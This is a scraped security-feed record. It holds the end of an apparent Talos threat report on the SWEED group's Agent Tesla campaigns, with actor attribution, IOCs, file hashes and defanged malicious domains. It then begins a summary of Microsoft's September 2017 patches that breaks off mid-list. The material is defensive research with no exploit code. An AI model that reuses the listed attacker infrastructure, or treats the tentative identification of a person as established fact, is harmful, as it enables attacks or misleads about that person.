\n\n\n[](<https://1.bp.blogspot.com/-4kNr0-E4lQw/XSx8BtMpnpI/AAAAAAAABRg/jSuJXB-dUhE8NnY26bO3gRCtFP-McBokACLcBGAs/s1600/image34.png>)\n\nIt is important to note that the avatar used by this Discord user (SWEE D) is the same avatar that is used by Skype user sweed.[redacted]. \n\n\n[](<https://1.bp.blogspot.com/-YqsT6QRIuv8/XSx8HqNWjoI/AAAAAAAABRo/l-SATXJ0ruAPdc-TSiGFBQE0QNuasi5TwCLcBGAs/s1600/image31.png>)\n\nWe actually contacted SWEE D on Skype and were able to confirm that the same user operates the Discord and Skype accounts: \n\n\n[](<https://1.bp.blogspot.com/-vw4K0x-B_9E/XSx8MlnUbZI/AAAAAAAABRs/AnevGM2cGdI7NrGDnWmtL9OCkCDeSOY_QCLcBGAs/s1600/image8.png>)\n\nDuring our interaction with SWEE D, they mentioned that they are a student studying ethical hacking and that they work in the IT departments of various companies to help remove malware and increase their security. \n\n\n[](<https://1.bp.blogspot.com/-TFxzKNzRRC4/XSx8TOrpU8I/AAAAAAAABR0/8Aih7iMc_LQpI92LpON444n1c0WrQMGHACLcBGAs/s1600/image33.png>)\n\nThis is contrary to the following activity which was observed in an IRC transaction where a user named \"sweed\" was submitting credit card information to a bot listening in the channel in an effort to check the validity and usability of presumably stolen credit card information. \n\n\n[](<https://1.bp.blogspot.com/-Z53y6IxVzTk/XSx8XzdyYkI/AAAAAAAABR8/q68l0JsloEYX_J-tf1hBHCoJIny4QbNnwCLcBGAs/s1600/image18.png>)\n\nThe IRC channel appeared to be created and used solely for this purpose, with a bot named \"chkViadex24\" returning information related to the credit card that was submitted: \n\n\n[](<https://1.bp.blogspot.com/-nCS7I1IW3KI/XSx8de_Ty4I/AAAAAAAABSA/iOy3R96k2TIjkL7XnQ4s-BF1BflZIUICgCLcBGAs/s1600/image25.png>)\n\nThis is an example demonstrating how stolen credit information is actively being used by adversaries to determine whether or not they can monetize the information once they have stolen it from victims. \n \nIt's possible that \"SWEE D\", \"sweed\" and [redacted] Daniel may be the same person. We also identified the following LinkedIn profile that listed the same name: \n\n\n[](<https://1.bp.blogspot.com/-gzQgpDh3zd4/XSx8kzwseGI/AAAAAAAABSI/m3Stbo6tFVs-p54blRsyx3pvvMDlFuyOQCLcBGAs/s1600/image12.png>)\n\nThis account lists Nigeria as their location. \"[redacted]\" is a Nigerian novel. Many of the details we identified during our analysis of \"sweed,\" such as information in the LinkedIn profile, the references to \"[redacted],\" the registrant information used, and the location listed in the Skype account indicate the individual is likely located in Nigeria. We believe \"sweed\" is a key member of the group and that other accounts are likely associated with customers or business partners. \n \n\n\n## Conclusion\n\n \nSWEED has been active for at least three years \u2014 and a user with that name has been active on various forums, IRC channels and Discord servers since at least 2015. Currently, SWEED is actively targeting small and medium-sized companies around the world. Based on the TTPs used by this group, SWEED should be considered a relatively amateur actor. They use well-known vulnerabilities, commodity stealers and RATs (Pony, Formbook, UnknownRAT, Agent Tesla, etc.) and appear to rely on kits readily available on hacking forums. SWEED consistently leverages packing and crypting in order to minimize detection by anti-malware solutions. We assess that SWEED also does not have effective operational security, as they used several of the same online accounts for about five years, allowing for the discovery of a lot of their information, operations and associates. \n \nAt this time, we cannot say with certainty whether the other accounts and associated individuals associated with SWEED are business associates or customers. However, they all use the same infrastructure in a coordinated manner across domains, rely on the same malware and packers, and all operate very similarly. While SWEED is relatively well-known in the security research community, this research provides insight into how these cybercriminal organizations operate and evolve over time in an effort to maximize their ability to generate revenue and evade detection. We expect SWEED to continue to operate for the foreseeable future and we will continue to monitor their activities to ensure that customers remain protected. \n \n\n\n## Coverage\n\n \nWays our customers can detect and block this threat are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-5LbEZMzMTPM/XSyEo6LKHoI/AAAAAAAABSY/VQK8MPWAxZYG24sFQA-gkUH2epneacxkgCLcBGAs/s1600/image32.png>)\n\n \nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free [here.](<http://cisco.com/go/tryamp>) \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or Web Security Appliance ([WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall ([NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)), Next-Generation Intrusion Prevention System ([NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firepower Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## Indicators of Compromise (IOCs)\n\n \nThe following IOCs have been observed as being associated with malware campaigns conducted by this group. \n\n\n### Campaign #1\n\nJava_Updater.zip -> 59b15f6ace090d05ac5f7692ef834433d8504352a7f45e80e7feb05298d9c2dd \nP-O of Jun2017.zip -> e397ba1674a6dc470281c0c83acd70fd4d772bf8dcf23bf2c692db6575f6ab08 \nAgent Tesla: 8c8f755b427b32e3eb528f5b59805b1532af3f627d690603ac12bf924289f36f \n\n\n### Campaign #2\n\nJava sample=> d27a29bdb0492b25bf71e536c8a1fae8373a4b57f01ad7481006f6849b246a97 \n\n\n### Campaign #3\n\nNew Order For Quotation.ppsx -> 65bdd250aa4b4809edc32faeba2781864a3fee7e53e1f768b35a2bdedbb1243b \n\n\n### Campaign #4\n\nSETTLEMENT OF OUTSTANDING.xlsx -> 111e1fff673466cedaed8011218a8d65f84bee48d5ce6d7e8f62cb37df75e671 \n\n\n### Campaign #5\n\nRequest and specification of our new order.xls -> 1dd4ac4925b58a2833b5c8969e7c5b5ff5ec590b376d520e6c0a114b941e2075 \nAgent Tesla -> fa6557302758bbea203967e70477336ac7a054b1df5a71d2fb6d822884e4e34f \n \n\n\n### Domains\n\nsweeddehacklord[.]us \nsweed-office.comie[.]ru \nsweed-viki[.]ru \nsweedoffice.duckdns[.]org \nsweedoffice-olamide.duckdns[.]org \nsweedoffice-chuks.duckdns[.]org \nwww.sweedoffice-kc.duckdns[.]org \nsweedoffice-kc.duckdns[.]org \nsweedoffice-goodman.duckdns[.]org \nsweedoffice-bosskobi.duckdns[.]org \nwww.sweedoffice-olamide.duckdns[.]org \nwww.sweedoffice-chuks.duckdns[.]org \naelna[.]com \ncandqre[.]com \nspedaqinterfreight[.]com \nworldjaquar[.]com \nzurieh[.]com \naiaininsurance[.]com \naidanube[.]com \nanernostat[.]com \nblssleel[.]com \nbwayachtng[.]com \ncablsol[.]com \ncatalanoshpping[.]com \ncawus-coskunsu[.]com \ncrosspoiimeri[.]com \ndougiasbarwick[.]com \nerieil[.]com \netqworld[.]com \nevegreen-shipping[.]com \ngufageneys[.]com \nhybru[.]com \nintermodaishipping[.]net \njltqroup[.]com \njyexports[.]com \nkayneslnterconnection[.]com \nkn-habour[.]com \nleocouriercompany[.]com \nlnnovalues[.]com \nmglt-mea[.]com \nmti-transt[.]com \nprofbuiiders[.]com \nquycarp[.]com \nregionaitradeinspections[.]com \nrepotc[.]com \nrsaqencies[.]com \nsamhwansleel[.]com \nserec[.]us \nsnapqata[.]com \nsukrltiv[.]com \nsupe-lab[.]com \nusarmy-mill[.]com \nvirdtech[.]com \nwillistoweswatson[.]com \nxlnya-cn[.]com \nzarpac[.]us \nOralbdentaltreatment[.]tk \nwlttraco[.]com \n \n\n\n", "modified": "2019-07-16T05:47:33", "published": "2019-07-16T05:47:33", "id": "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/vpuNeB6RXIY/sweed-agent-tesla.html", "type": "talosblog", "title": "SWEED: Exposing years of Agent Tesla campaigns", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-20T10:59:03", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0161", "CVE-2017-11761", "CVE-2017-11764", "CVE-2017-11766", "CVE-2017-8567", "CVE-2017-8593", "CVE-2017-8597", "CVE-2017-8628", "CVE-2017-8629", "CVE-2017-8630", "CVE-2017-8631", "CVE-2017-8632", "CVE-2017-8643", "CVE-2017-8648", "CVE-2017-8649", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8685", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8696", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8704", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8710", "CVE-2017-8711", "CVE-2017-8712", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8716", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8724", "CVE-2017-8725", "CVE-2017-8728", "CVE-2017-8729", "CVE-2017-8731", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8739", "CVE-2017-8740", "CVE-2017-8741", "CVE-2017-8742", "CVE-2017-8743", "CVE-2017-8744", "CVE-2017-8745", "CVE-2017-8746", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8751", "CVE-2017-8752", "CVE-2017-8753", "CVE-2017-8754", "CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8758", "CVE-2017-8759", "CVE-2017-9417"], "description": "Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 81 new vulnerabilities with 27 of them rated critical, 52 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Office, Remote Desktop Protocol, Sharepoint, Windows Graphic Display Interface, Windows Kernel Mode Drivers, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.<br /><br />Note that the Bluetooth vulnerabilities known as \"BlueBorne\" that affected Windows have been patched in this latest release. For more information, please refer to CVE-2017-8628.<br /><br /><a name='more'></a><h2 id=\"h.wjrt5zh1f6pu\">Vulnerabilities Rated Critical</h2><br />The following vulnerabilities are rated \"critical\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8747\">CVE-2017-8747</a> - Internet Explorer Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8749\">CVE-2017-8749</a> - Internet Explorer Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8750\">CVE-2017-8750</a> - Microsoft Browser Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8731\">CVE-2017-8731</a> - Microsoft Edge Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8734\">CVE-2017-8734</a> - Microsoft Edge Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8751\">CVE-2017-8751</a> - Microsoft Edge Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8755\">CVE-2017-8755</a> - Microsoft Edge Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8756\">CVE-2017-8756</a> - Microsoft Edge Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11766\">CVE-2017-11766</a> - Microsoft Edge Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8757\">CVE-2017-8757</a> - Microsoft Edge Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8696\">CVE-2017-8696</a> - Microsoft Graphics Component Remote Code Execution</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8728\">CVE-2017-8728</a> - Microsoft PDF Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8737\">CVE-2017-8737</a> - Microsoft PDF Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0161\">CVE-2017-0161</a> - NetBIOS Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8649\">CVE-2017-8649</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8660\">CVE-2017-8660</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8729\">CVE-2017-8729</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8738\">CVE-2017-8738</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8740\">CVE-2017-8740</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8741\">CVE-2017-8741</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8748\">CVE-2017-8748</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8752\">CVE-2017-8752</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8753\">CVE-2017-8753</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11764\">CVE-2017-11764</a> - Scripting Engine Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8682\">CVE-2017-8682</a> - Win32k Graphics Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8686\">CVE-2017-8686</a> - Windows DHCP Server Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8676\">CVE-2017-8676</a> - Windows GDI+ Information Disclosure Vulnerability</li></ul>The following briefly describes these vulnerabilities.<br /><br /><h3 id=\"h.b21z3uko0dvb\">CVE-2017-8747, CVE-2017-8749 - Internet Explorer Memory Corruption Vulnerability</h3><br />Two vulnerabilities have been identified in Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specially crafted webpage that exploits one of these flaws.<br /><br /><h3 id=\"h.stimxk5dlt9s\">CVE-2017-8750 - Microsoft Browser Memory Corruption Vulnerability</h3><br />A vulnerability have been identified in Edge and Internet Explorer that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw.<br /><br /><h3 id=\"h.noriw5kti6\">Multiple CVEs - Microsoft Edge Memory Corruption Vulnerability</h3><br />Multiple vulnerabilities have been identified in Microsoft Edge that could allow an attacker to execute arbitrary code on an affected host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who visit a specially crafted web page under the control of the attacker could be exploited.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8731</li><li>CVE-2017-8734</li><li>CVE-2017-8751</li><li>CVE-2017-8755</li><li>CVE-2017-8756</li><li>CVE-2017-11766</li></ul><h3 id=\"h.1v376u5n6xmf\">CVE-2017-8757 - Microsoft Edge Remote Code Execution Vulnerability</h3><br />A vulnerability have been identified in Edge that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw. Alternatively, an attacker could embed an ActiveX control marked \"safe for initialization\" within a Microsoft Office document that \"hosts the browser rendering engine\" and socially engineer the user to open the malicious document.<br /><br /><h3 id=\"h.ur4dd8a6i1eq\">CVE-2017-8696 - Microsoft Graphics Component Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in Windows Uniscribe that could allow an attacker to remotely execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability. Successful exploitation would result in arbitrary code execution in the context of the current user.<br /><br /><h3 id=\"h.9ttwbr9e0ewj\">CVE-2017-8728, CVE-2017-8737 - Microsoft PDF Remote Code Execution Vulnerability</h3><br />Two vulnerabilities in the Microsoft Windows PDF library have been identified that could allow an attacker to execute arbitrary code on a targeted host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities would result in arbitrary code execution in the context of the current user. Users who open a specially crafted PDF file or who visit a web page containing a specially crafted PDF could exploit these vulnerabilities.<br /><br /><h3 id=\"h.crqjkzdd0al6\">CVE-2017-0161 - NetBIOS Remote Code Execution Vulnerability</h3><br />A vulnerability in NetBT Session Services has been identified that could allow an attacker to execute arbitrary code on the targeted host remotely. This vulnerability manifests as a race condition \"when NetBT fails to maintain certain sequencing requirements.\" An attacker who sends specially crafted NetBT Session Service packets to the targeted system could exploit this vulnerability and achieve remote code execution.<br /><br /><h3 id=\"h.d8c9mlg86eww\">Multiple CVEs - Scripting Engine Memory Corruption Vulnerability</h3><br />Multiple vulnerabilities have been identified in the Microsoft Browser JavaScript engine that could allow remote code execution to occur in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory, resulting in memory corruption. Exploitation of these vulnerabilities is achievable if a user visits a specially crafted web page that contains JavaScript designed to exploit one or more of these vulnerabilities. <br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8649</li><li>CVE-2017-8660</li><li>CVE-2017-8729</li><li>CVE-2017-8738</li><li>CVE-2017-8740</li><li>CVE-2017-8741</li><li>CVE-2017-8748</li><li>CVE-2017-8752</li><li>CVE-2017-8753</li><li>CVE-2017-11764</li></ul><h3 id=\"h.cya79aegordp\">CVE-2017-8682 - Win32k Graphics Remote Code Execution Vulnerability</h3><br />A vulnerability in the Windows font library has been identified that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of embedded fonts. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. For this vulnerability to be exploited, a user would need to either navigate to a specially crafted website or open a specially crafted document that is designed to exploit this flaw.<br /><br /><h3 id=\"h.z0mubxvpwva7\">CVE-2017-8686 - Windows DHCP Server Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in the Windows Server DHCP service where remote code execution could be achieved if exploited. This vulnerability manifests as a result of the service incorrectly handling DHCP packets. Successful exploitation could allow an attacker to remotely execute code on an affected host or create a denial of service condition. For this vulnerability to be exploited, an attacker would need to send a specially crafted packet to the DHCP server that is set to failover mode. If the server is not set to failover mode, the attack will not succeed.<br /><br /><h3 id=\"h.og6ixgv9kv1f\">CVE-2017-8676 - Windows GDI+ Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. This vulnerability manifests due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br /><h2 id=\"h.kw73svtlwob2\">Vulnerabilities Rated Important</h2><br />The following vulnerabilities are rated \"important\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759\">CVE-2017-8759</a> - .NET Framework Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-9417\">CVE-2017-9417</a> - Broadcom BCM43xx Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8746\">CVE-2017-8746</a> - Device Guard Security Feature Bypass Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8695\">CVE-2017-8695</a> - Graphics Component Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8704\">CVE-2017-8704</a> - Hyper-V Denial of Service Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8706\">CVE-2017-8706</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8707\">CVE-2017-8707</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8711\">CVE-2017-8711</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8712\">CVE-2017-8712</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8713\">CVE-2017-8713</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8733\">CVE-2017-8733</a> - Internet Explorer Spoofing Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628\">CVE-2017-8628</a> - Microsoft Bluetooth Driver Spoofing Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8736\">CVE-2017-8736</a> - Microsoft Browser Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8597\">CVE-2017-8597</a> - Microsoft Edge Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8643\">CVE-2017-8643</a> - Microsoft Edge Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8648\">CVE-2017-8648</a> - Microsoft Edge Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8754\">CVE-2017-8754</a> - Microsoft Edge Security Feature Bypass Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8724\">CVE-2017-8724</a> - Microsoft Edge Spoofing Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8758\">CVE-2017-8758</a> - Microsoft Exchange Cross-Site Scripting Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11761\">CVE-2017-11761</a> - Microsoft Exchange Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8630\">CVE-2017-8630</a> - Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8631\">CVE-2017-8631</a> - Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8632\">CVE-2017-8632</a> - Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8744\">CVE-2017-8744</a> - Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8725\">CVE-2017-8725</a> - Microsoft Office Publisher Remote Code Execution</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8567\">CVE-2017-8567</a> - Microsoft Office Remote Code Execution</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8745\">CVE-2017-8745</a> - Microsoft SharePoint Cross Site Scripting Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8629\">CVE-2017-8629</a> - Microsoft SharePoint XSS Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8742\">CVE-2017-8742</a> - PowerPoint Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8743\">CVE-2017-8743</a> - PowerPoint Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8714\">CVE-2017-8714</a> - Remote Desktop Virtual Host Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8739\">CVE-2017-8739</a> - Scripting Engine Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8692\">CVE-2017-8692</a> - Uniscribe Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8675\">CVE-2017-8675</a> - Win32k Elevation of Privilege Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8720\">CVE-2017-8720</a> - Win32k Elevation of Privilege Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8683\">CVE-2017-8683</a> - Win32k Graphics Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8677\">CVE-2017-8677</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8678\">CVE-2017-8678</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8680\">CVE-2017-8680</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8681\">CVE-2017-8681</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8687\">CVE-2017-8687</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8702\">CVE-2017-8702</a> - Windows Elevation of Privilege Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8684\">CVE-2017-8684</a> - Windows GDI+ Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8685\">CVE-2017-8685</a> - Windows GDI+ Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8688\">CVE-2017-8688</a> - Windows GDI+ Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8710\">CVE-2017-8710</a> - Windows Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8679\">CVE-2017-8679</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8708\">CVE-2017-8708</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8709\">CVE-2017-8709</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8719\">CVE-2017-8719</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8716\">CVE-2017-8716</a> - Windows Security Feature Bypass Vulnerability</li><li><a 